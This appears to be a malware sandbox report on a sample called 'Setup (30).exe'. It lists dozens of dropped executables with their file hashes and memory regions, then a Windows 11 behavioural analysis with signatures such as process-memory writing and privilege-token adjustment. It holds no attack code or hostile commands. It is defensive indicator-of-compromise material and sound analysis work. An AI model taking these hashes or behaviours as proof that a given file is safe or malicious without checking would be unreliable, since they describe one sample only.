| SHA256 | c14d115b8521d8eff7d58acd565a4150b1eed68f112c2cd0b4e035326f831d73 |
| SHA512 | a92e76367acd21f9a9f29d2ef7ad435686b2bc43a25b46e90e0d5c3ccc0494c14b499a48150cb6b83ee8718eab19f271e38505326e9d745cb3c402fbd1b5f4cf |
memory/1712-227-0x0000000000060000-0x0000000000061000-memory.dmp
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
| MD5 | ec5c1f5a598d85d60d987827a31746a1 |
| SHA1 | 56cd531452c3e3a5baecb0abe4b032997155aaec |
| SHA256 | ab59e845bc16961db7c3f2f8249083cff0098b263dc37b7d2819b223153d2ebe |
| SHA512 | 3705d1e5777a4d9b36b2f8f382277e301c5796e1f940c5e2387bc17b671e1511cd1bebc41e834265f491c13226338cb9415b45c33f347b4d4752e4ce20b72a13 |
memory/1992-223-0x00007FFFD88D0000-0x00007FFFD8A1F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\82d93c54-5db6-40b3-ab75-d48cebc8eb54\IIIIIIIIIIIIIIIIIIIII.dll
| MD5 | e8641f344213ca05d8b5264b5f4e2dee |
| SHA1 | 96729e31f9b805800b2248fd22a4b53e226c8309 |
| SHA256 | 85e82b9e9200e798e8f434459eacee03ed9818cc6c9a513fe083e72d48884e24 |
| SHA512 | 3130f32c100ecb97083ad8ac4c67863e9ceed3a9b06fc464d1aeeaec389f74c8bf56f4ce04f6450fd2cc0fa861d085101c433cfa4bec3095f8ebeeb53b739109 |
C:\Users\Admin\Documents\epSY5JonORm5zUOCET_ffnPB.exe
| MD5 | 25b1f480760dd65b48c99c4b64a8375c |
| SHA1 | a35e4dc7cfca592a28fba766882d152c6e76f659 |
| SHA256 | f10ecdde41dded7dc8e3a0b79c672bd6e9f1f23e31bbc011fb771811181ea11c |
| SHA512 | c1ad586717b10ac516b7af4a9ab779e86101cfd26a2c996b39bd0066723c8bac34db5c5e77604bfe00ef6ec5916563d34913c03cae7088433b949881b6438d42 |
memory/1288-216-0x0000000000E30000-0x0000000000E31000-memory.dmp
memory/1200-169-0x0000000000000000-mapping.dmp
memory/1556-168-0x0000000000000000-mapping.dmp
memory/1288-167-0x0000000000000000-mapping.dmp
memory/1500-165-0x0000000000000000-mapping.dmp
memory/1668-166-0x0000000000000000-mapping.dmp
memory/1492-163-0x0000000000000000-mapping.dmp
memory/1536-164-0x0000000000000000-mapping.dmp
memory/1632-162-0x0000000000000000-mapping.dmp
memory/1712-160-0x0000000000000000-mapping.dmp
memory/1944-161-0x0000000000000000-mapping.dmp
memory/2160-158-0x0000000000000000-mapping.dmp
memory/2084-159-0x0000000000000000-mapping.dmp
memory/1748-157-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\Fe6dg4sTI4b3YuqL8xbjBfod.exe
| MD5 | 41c97e6248c6939d50df1c99ab04679d |
| SHA1 | 0af10b82aa8619e285627de8e7af52b772e8ed18 |
| SHA256 | b511da29b61e72108cc597ad72ecb1f920d22d9bfc0bb5ff4e3d33d9da7995ea |
| SHA512 | 04ef83f1402c630cb57a4793f74bbf78ae06bb7f9f78fe071a4303a3949feec7cb2ef1698981116ec13020e6e25ecaf92cedfe1a55838a578a46fb0de3a50677 |
memory/1288-234-0x0000000005C90000-0x0000000005C91000-memory.dmp
memory/1200-231-0x0000000000C30000-0x0000000000C31000-memory.dmp
memory/1288-241-0x0000000005790000-0x0000000005791000-memory.dmp
memory/1932-243-0x0000000000C60000-0x0000000000C7C000-memory.dmp
memory/1288-242-0x0000000006240000-0x0000000006241000-memory.dmp
memory/4984-240-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\Ig_d14eGdwervmy7DFofIV9O.exe
| MD5 | a18f404bd61a4168a4693b1a76ffa81f |
| SHA1 | 021faa4316071e2db309658d2607779e911d1be7 |
| SHA256 | 403b1b1f0aca4695f9826afccbff72c3463f47fe9dd72daf74250dab62f52d0e |
| SHA512 | 47f58cd69e3cb7042b94ef0205fda6d8aa0f3e7d8358f09c7b1797f6c17c38dc839d01bb6ee7bedaeb4d1953da955433a6dbdcaffbc85f0c5a23509865ee2d4b |
C:\Users\Admin\Documents\XdSH7DWXqp6yaXqcW2MnJi9V.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
C:\Users\Admin\Documents\tagR_GHtIRsJS5siarvoMNbq.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe
| MD5 | a70224fc6784c169edde4878b21e6a3b |
| SHA1 | 7a3cf5acb7434ae42d906ec67e3a477bad363b8c |
| SHA256 | 83ca077db9015297ea5c26b515e42ce340c88a944359335ed3cdb7f8184d8a2f |
| SHA512 | 6fbf4429cb8a3f6e7b84fad70ba960b17db2e8b0c273e4303471f64b0b8fc171bab9254d815b4b57e528854f88a74e959a389f065128cf185889a1f570b0813f |
C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe
| MD5 | be5ac1debc50077d6c314867ea3129af |
| SHA1 | 2de0add69b7742fe3e844f940464a9f965b6e68f |
| SHA256 | 577643f523646cd00dedf577aeb5848405cc29518cabb4dec9ca6bcb316f9abd |
| SHA512 | 7ff22965ddce1830fbf9b05bcf19da894378f73d423c591d45397d952729ee1d0d816fd2e87e91269f6969849ecb94ab8b86f3933fd723a9e2cdea024958c324 |
memory/1992-235-0x000000001BC90000-0x000000001BC92000-memory.dmp
memory/1200-244-0x0000000005650000-0x0000000005651000-memory.dmp
memory/1944-248-0x0000000004890000-0x00000000048BF000-memory.dmp
memory/1288-249-0x00000000056E0000-0x0000000005C86000-memory.dmp
memory/1712-255-0x0000000004CA0000-0x0000000004CA1000-memory.dmp
memory/1712-250-0x0000000002320000-0x0000000002321000-memory.dmp
memory/1932-257-0x0000000000F30000-0x0000000000F32000-memory.dmp
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
| MD5 | aed57d50123897b0012c35ef5dec4184 |
| SHA1 | 568571b12ca44a585df589dc810bf53adf5e8050 |
| SHA256 | 096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e |
| SHA512 | ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c |
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
| MD5 | aed57d50123897b0012c35ef5dec4184 |
| SHA1 | 568571b12ca44a585df589dc810bf53adf5e8050 |
| SHA256 | 096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e |
| SHA512 | ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c |
memory/4120-247-0x0000000000000000-mapping.dmp
memory/1820-258-0x00000000059C0000-0x00000000059C1000-memory.dmp
memory/4076-256-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
| MD5 | a3ec5ee946f7b93287ba9cf7facc6647 |
| SHA1 | 3595b700f8e41d45d8a8d15b42cd00cc19922647 |
| SHA256 | 5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0 |
| SHA512 | 63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6 |
memory/4076-262-0x00000000006E0000-0x00000000006E3000-memory.dmp
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
| MD5 | a3ec5ee946f7b93287ba9cf7facc6647 |
| SHA1 | 3595b700f8e41d45d8a8d15b42cd00cc19922647 |
| SHA256 | 5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0 |
| SHA512 | 63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6 |
memory/4576-259-0x0000000000000000-mapping.dmp
memory/1200-263-0x00000000055D0000-0x0000000005646000-memory.dmp
memory/1668-267-0x0000000000FD0000-0x0000000000FD1000-memory.dmp
C:\Program Files (x86)\Company\NewProduct\customer3.exe
| MD5 | 9499dac59e041d057327078ccada8329 |
| SHA1 | 707088977b09835d2407f91f4f6dbe4a4c8f2fff |
| SHA256 | ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9 |
| SHA512 | 9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397 |
C:\Program Files (x86)\Company\NewProduct\customer3.exe
| MD5 | 9499dac59e041d057327078ccada8329 |
| SHA1 | 707088977b09835d2407f91f4f6dbe4a4c8f2fff |
| SHA256 | ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9 |
| SHA512 | 9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397 |
memory/1196-273-0x0000000000480000-0x0000000000481000-memory.dmp
memory/2832-265-0x0000000000000000-mapping.dmp
memory/2084-274-0x0000000000300000-0x0000000000301000-memory.dmp
memory/4728-280-0x0000000000000000-mapping.dmp
memory/1992-283-0x0000000003000000-0x000000000301B000-memory.dmp
memory/3248-282-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
| MD5 | 6eab2a9353bf7254d1d583489d8317e2 |
| SHA1 | 553754576adb15c7a2a4d270b2a2689732002165 |
| SHA256 | 4aefb36ac35b1cc94895ea4459cc8e51e88a9fa8e957b94617d66a2c841e182b |
| SHA512 | 9c5a4f15794418adcce63246fdba9209fe6a9df25d5044e93de8f80e68e92e246db82bb66c3ac5f4815c81570df9588caa63b8d4099e07e9da840754f71ca569 |
memory/3828-287-0x0000000000000000-mapping.dmp
memory/1668-292-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/1668-286-0x0000000005860000-0x0000000005861000-memory.dmp
memory/1500-285-0x0000000000660000-0x0000000000661000-memory.dmp
memory/1668-281-0x0000000005F90000-0x0000000005F91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
| MD5 | 6eab2a9353bf7254d1d583489d8317e2 |
| SHA1 | 553754576adb15c7a2a4d270b2a2689732002165 |
| SHA256 | 4aefb36ac35b1cc94895ea4459cc8e51e88a9fa8e957b94617d66a2c841e182b |
| SHA512 | 9c5a4f15794418adcce63246fdba9209fe6a9df25d5044e93de8f80e68e92e246db82bb66c3ac5f4815c81570df9588caa63b8d4099e07e9da840754f71ca569 |
memory/1992-305-0x00000000031E0000-0x00000000031E1000-memory.dmp
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
| MD5 | ec5c1f5a598d85d60d987827a31746a1 |
| SHA1 | 56cd531452c3e3a5baecb0abe4b032997155aaec |
| SHA256 | ab59e845bc16961db7c3f2f8249083cff0098b263dc37b7d2819b223153d2ebe |
| SHA512 | 3705d1e5777a4d9b36b2f8f382277e301c5796e1f940c5e2387bc17b671e1511cd1bebc41e834265f491c13226338cb9415b45c33f347b4d4752e4ce20b72a13 |
C:\Users\Admin\Documents\pHDW1j1IeTZHDMBxJLx7Jz7d.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
memory/1668-295-0x00000000058C0000-0x00000000058C1000-memory.dmp
memory/3248-294-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1992-300-0x000000001E040000-0x000000001E041000-memory.dmp
memory/1196-299-0x0000000005320000-0x0000000005321000-memory.dmp
C:\Users\Admin\Documents\WTQvm11a9eyMEXiXLw7QhwZ0.exe
| MD5 | ff2d2b1250ae2706f6550893e12a25f8 |
| SHA1 | 5819d925377d38d921f6952add575a6ca19f213b |
| SHA256 | ca46080e121408d9624322e505dc2178ba99e15871c90e101b54e42ea7b54a96 |
| SHA512 | c66544678f3dd49aa1a23cd459a556d923ba44c5d88334a165ea7bd16e4561955536546627b7e83bf1e759428c04b6312e08fdc8c2f6fab69cd29f3b62ce3d23 |
C:\Users\Admin\Documents\pHDW1j1IeTZHDMBxJLx7Jz7d.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
memory/1492-313-0x0000000003F70000-0x0000000003F7A000-memory.dmp
memory/2300-317-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1064-316-0x0000000000400000-0x0000000000448000-memory.dmp
memory/4524-318-0x0000000000000000-mapping.dmp
memory/668-312-0x0000000000000000-mapping.dmp
memory/2300-311-0x0000000000000000-mapping.dmp
memory/1064-310-0x0000000000000000-mapping.dmp
memory/1992-309-0x000000001BC10000-0x000000001BC11000-memory.dmp
memory/1196-319-0x0000000005200000-0x0000000005201000-memory.dmp
memory/2188-327-0x0000000003F80000-0x0000000003F99000-memory.dmp
memory/1536-333-0x0000000000000000-mapping.dmp
memory/1556-336-0x00000000026E0000-0x0000000002710000-memory.dmp
memory/4748-335-0x0000000000000000-mapping.dmp
memory/3184-326-0x0000000000000000-mapping.dmp
memory/2488-325-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\XdSH7DWXqp6yaXqcW2MnJi9V.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
memory/2084-343-0x0000000005760000-0x0000000005761000-memory.dmp
memory/2488-337-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3988-354-0x0000000000000000-mapping.dmp
memory/1500-351-0x0000000005810000-0x0000000005811000-memory.dmp
memory/1100-348-0x0000000004140000-0x00000000041DD000-memory.dmp
memory/2832-361-0x000001A3F08B0000-0x000001A3F091F000-memory.dmp
memory/4524-358-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/2360-365-0x0000000003F80000-0x0000000003FB0000-memory.dmp
memory/3696-374-0x0000000000000000-mapping.dmp
memory/3184-371-0x00000000057C0000-0x0000000005DD8000-memory.dmp
memory/1632-367-0x0000000003F70000-0x0000000003F79000-memory.dmp
memory/1668-375-0x0000000005960000-0x0000000005961000-memory.dmp
memory/2300-378-0x00000000053A0000-0x0000000005946000-memory.dmp
memory/4524-386-0x00000000021A0000-0x00000000021A1000-memory.dmp
memory/1276-382-0x0000000004270000-0x0000000004375000-memory.dmp
memory/1428-393-0x0000000000000000-mapping.dmp
memory/3988-392-0x000000001BAF0000-0x000000001BAF2000-memory.dmp
memory/3208-389-0x0000000004A40000-0x0000000004A56000-memory.dmp
memory/4932-388-0x0000000000000000-mapping.dmp
memory/2376-394-0x00000000025F0000-0x000000000261F000-memory.dmp
memory/4524-398-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/3396-400-0x0000000000000000-mapping.dmp
memory/2904-396-0x0000000000000000-mapping.dmp
memory/4524-401-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/4524-404-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/4524-408-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
memory/4524-406-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/4524-412-0x0000000005AC0000-0x0000000005AC1000-memory.dmp
memory/1992-419-0x000000001BC92000-0x000000001BC94000-memory.dmp
memory/4524-410-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
memory/4524-421-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
memory/1564-415-0x0000000000000000-mapping.dmp
memory/2160-426-0x0000000004A60000-0x0000000005386000-memory.dmp
memory/4524-429-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
memory/1992-433-0x000000001BC94000-0x000000001BC95000-memory.dmp
memory/4524-431-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
memory/4524-434-0x0000000005B00000-0x0000000005B01000-memory.dmp
memory/4932-435-0x0000000005410000-0x0000000005A28000-memory.dmp
memory/4524-437-0x0000000005B10000-0x0000000005B11000-memory.dmp
memory/4524-441-0x0000000005B20000-0x0000000005B21000-memory.dmp
memory/4524-443-0x0000000005B30000-0x0000000005B31000-memory.dmp
memory/4524-446-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/4524-449-0x0000000005B50000-0x0000000005B51000-memory.dmp
memory/4524-455-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/2832-458-0x000001A3F0920000-0x000001A3F09EF000-memory.dmp
memory/4576-463-0x0000000000000000-mapping.dmp
memory/3396-468-0x0000000005740000-0x0000000005741000-memory.dmp
memory/1600-465-0x0000000000000000-mapping.dmp
memory/3572-471-0x0000000000000000-mapping.dmp
memory/1428-470-0x00000000054E0000-0x00000000054E1000-memory.dmp
memory/1480-475-0x0000000000000000-mapping.dmp
memory/4232-482-0x0000000000000000-mapping.dmp
memory/4932-483-0x000000007F820000-0x000000007F821000-memory.dmp
memory/1480-485-0x0000000003200000-0x0000000003201000-memory.dmp
memory/3572-487-0x0000000005910000-0x0000000005911000-memory.dmp
memory/3348-494-0x0000000000000000-mapping.dmp
memory/4256-492-0x0000000000000000-mapping.dmp
memory/488-497-0x0000000000000000-mapping.dmp
memory/5244-504-0x0000000000000000-mapping.dmp
memory/1480-503-0x0000000005210000-0x00000000052E0000-memory.dmp
memory/5140-502-0x0000000000000000-mapping.dmp
memory/5424-509-0x0000000000000000-mapping.dmp
memory/5384-508-0x0000000000000000-mapping.dmp
memory/5140-514-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5384-520-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5676-522-0x0000000000000000-mapping.dmp
memory/5424-528-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/5844-527-0x0000000000000000-mapping.dmp
memory/1480-524-0x00000000053A0000-0x0000000005454000-memory.dmp
memory/5824-526-0x0000000000000000-mapping.dmp
memory/6020-535-0x0000000000000000-mapping.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
219s
Max time network
1603s
Command Line
Signatures
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4664 created 4424 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (30).exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (30).exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4664 wrote to memory of 4424 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (30).exe |
| PID 4664 wrote to memory of 4424 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (30).exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (30).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (30).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv spk7Mq6mdk6K+NQLk1ou5Q.0.2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 4424 -ip 4424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1584
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
Network
